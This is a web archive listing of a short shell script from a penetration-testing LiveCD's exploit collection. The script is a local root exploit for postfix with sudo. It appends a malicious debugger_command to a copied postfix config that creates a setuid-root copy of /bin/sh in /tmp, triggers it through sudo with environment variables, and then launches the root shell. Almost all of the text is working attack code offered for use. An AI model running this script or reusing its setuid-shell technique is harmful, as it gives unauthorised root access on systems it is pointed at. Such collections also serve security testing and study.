home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / postfix / sudo-postfix-ex.sh < prev   
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  809b  |  38 lines
  1. #!/bin/sh
  2. #
  3. # root shell exploit for postfix + sudo
  4. # tested on debian powerpc unstable
  5. #
  6. # by Charles 'core' Stevenson <core@bokeoa.com>
  7.  
  8. # Put your password here if you're not in the sudoers file
  9. PASSWORD=wdnownz
  10.  
  11. echo -e "sudo exploit by core <core@bokeoa.com>\n"
  12.  
  13. echo "Setting up postfix config directory..."
  14. /bin/cp -r /etc/postfix /tmp
  15.  
  16. echo "Adding malicious debugger command..."
  17. echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf
  18.  
  19. echo "Setting up environment..."
  20. export MAIL_CONFIG=/tmp/postfix
  21. export MAIL_DEBUG=
  22.  
  23. sleep 2
  24.  
  25. echo "Trying to exploit..."
  26. echo -e "$PASSWORD\n"|/usr/bin/sudo su -
  27.  
  28. sleep 2
  29.  
  30. echo "We should have a root shell let's check..."
  31. ls -l /tmp/sh
  32.  
  33. echo "Cleaning up..."
  34. rm -rf /tmp/postfix
  35.  
  36. echo "Attempting to run root shell..."
  37. /tmp/sh
  38.